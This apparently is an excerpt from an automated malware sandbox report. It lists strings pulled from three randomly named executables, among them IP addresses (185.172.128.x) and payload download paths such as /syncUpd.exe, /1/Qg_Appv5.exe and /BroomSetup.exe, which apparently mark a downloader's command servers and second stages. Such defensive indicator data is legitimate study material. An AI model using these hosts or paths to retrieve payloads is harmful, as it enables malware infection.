                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: three11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: four11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: @11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: @19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Qg_Appv5.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Qg_Appv5.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
